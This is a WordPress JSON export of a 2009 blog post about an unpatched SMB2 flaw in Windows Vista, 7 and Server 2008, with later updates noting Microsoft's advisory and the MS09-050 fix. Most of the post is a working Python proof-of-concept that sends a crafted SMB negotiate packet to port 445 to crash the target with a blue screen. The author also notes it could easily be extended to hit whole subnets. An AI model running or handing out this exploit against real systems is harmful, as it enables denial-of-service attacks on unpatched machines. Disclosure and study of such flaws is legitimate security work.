{"id":1901,"date":"2009-09-08T15:48:44","date_gmt":"2009-09-08T19:48:44","guid":{"rendered":"http:\/\/nuxx.net\/blog\/?p=1901"},"modified":"2009-10-13T23:02:59","modified_gmt":"2009-10-14T03:02:59","slug":"ms09-0","status":"publish","type":"post","link":"https:\/\/nuxx.net\/blog\/2009\/09\/08\/ms09-0\/","title":{"rendered":"MS09-0??"},"content":{"rendered":"<p><center><\/p>\n<table cellpadding=1>\n<tr>\n<td bgcolor=\"black\"><a href=\"https:\/\/nuxx.net\/gallery\/v\/moblog\/090908-150020.jpg.html?g2_imageViewsIndex=2\"><img decoding=\"async\" src=\"https:\/\/nuxx.net\/gallery\/d\/86143-2\/090908-150020.jpg\" height=480 width=640 border=0 title=\"Unpatched vulnerability in Windows Vista, 7, and Server 2008's SMB2 implementation in SRV2.SYS allowing for a remote BSOD.\"><\/a><\/td>\n<\/tr>\n<\/table>\n<p><\/center><\/p>\n<p>As is normal for a <a href=\"http:\/\/en.wikipedia.org\/wiki\/Patch_Tuesday\">Patch Tuesday<\/a>, Microsoft released a bunch of patches. Unfortunately, none of them fix a vulnerability in SMB2 on Vista, 7, or Server 2008 which allows easy remote BSODs using a single packet. 
The code below, which works under Python 2.6 on Windows, was very slightly adapted from <a href=\"http:\/\/seclists.org\/fulldisclosure\/2009\/Sep\/0039.html\">this post to Full Disclosure<\/a>.<\/p>\n<blockquote>\n<pre>import socket<\/pre>\n<pre>host = \"127.0.0.1\", 445<\/pre>\n<pre>buff = (<\/pre>\n<pre>\"\\x00\\x00\\x00\\x90\" # Begin SMB header: Session message<\/pre>\n<pre>\"\\xff\\x53\\x4d\\x42\" # Server Component: SMB<\/pre>\n<pre>\"\\x72\\x00\\x00\\x00\" # Negotiate Protocol<\/pre>\n<pre>\"\\x00\\x18\\x53\\xc8\" # Operation 0x18 & sub 0xc853<\/pre>\n<pre>\"\\x00\\x26\" # Process ID High: --> :) normal value should be \"\\x00\\x00\"<\/pre>\n<pre>\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xfe\"<\/pre>\n<pre>\"\\x00\\x00\\x00\\x00\\x00\\x6d\\x00\\x02\\x50\\x43\\x20\\x4e\\x45\\x54\"<\/pre>\n<pre>\"\\x57\\x4f\\x52\\x4b\\x20\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x20\\x31\"<\/pre>\n<pre>\"\\x2e\\x30\\x00\\x02\\x4c\\x41\\x4e\\x4d\\x41\\x4e\\x31\\x2e\\x30\\x00\"<\/pre>\n<pre>\"\\x02\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x66\\x6f\\x72\\x20\\x57\"<\/pre>\n<pre>\"\\x6f\\x72\\x6b\\x67\\x72\\x6f\\x75\\x70\\x73\\x20\\x33\\x2e\\x31\\x61\"<\/pre>\n<pre>\"\\x00\\x02\\x4c\\x4d\\x31\\x2e\\x32\\x58\\x30\\x30\\x32\\x00\\x02\\x4c\"<\/pre>\n<pre>\"\\x41\\x4e\\x4d\\x41\\x4e\\x32\\x2e\\x31\\x00\\x02\\x4e\\x54\\x20\\x4c\"<\/pre>\n<pre>\"\\x4d\\x20\\x30\\x2e\\x31\\x32\\x00\\x02\\x53\\x4d\\x42\\x20\\x32\\x2e\"<\/pre>\n<pre>\"\\x30\\x30\\x32\\x00\"<\/pre>\n<pre>)<\/pre>\n<pre>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<\/pre>\n<pre>s.connect(host)<\/pre>\n<pre>s.send(buff)<\/pre>\n<pre>s.close()<\/pre>\n<\/blockquote>\n<p><strong>UPDATE:<\/strong> Microsoft has posted <a href=\"http:\/\/www.microsoft.com\/technet\/security\/advisory\/975497.mspx\">975497 &#8211; Vulnerabilities in SMB Could Allow Remote Code Execution<\/a> which states:<\/p>\n<blockquote><p><cite>Microsoft is investigating new public reports of a possible vulnerability in Microsoft 
Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.<\/cite><\/p><\/blockquote>\n<p>I&#8217;m not sure how they define attack, but that BSOD above sure looks like one and making something quick to hit whole subnets in a go would be trivial. <\/p>\n<p><strong>UPDATE 2:<\/strong> This was fixed on 13-Oct-2009 in <a href=\"http:\/\/www.microsoft.com\/technet\/security\/bulletin\/ms09-050.mspx\">MS09-050<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>As is normal for a Patch Tuesday, Microsoft released a bunch of patches. Unfortunately, none of them fix a vulnerability in SMB2 on Vista, 7,&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/nuxx.net\/blog\/2009\/09\/08\/ms09-0\/\">Continue reading<span class=\"screen-reader-text\">MS09-0??<\/span><\/a><\/div>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[],"class_list":["post-1901","post","type-post","status-publish","format-standard","hentry","category-computers","entry"],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts\/1901","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/comments?post=1901"}],"version-history":[{"count":6,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts\/1901\/revisions"}],"predecessor-version":[{"id":1980,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts\/1901\/revisions\/1980"}],"wp:attachment":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v
2\/media?parent=1901"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/categories?post=1901"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/tags?post=1901"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}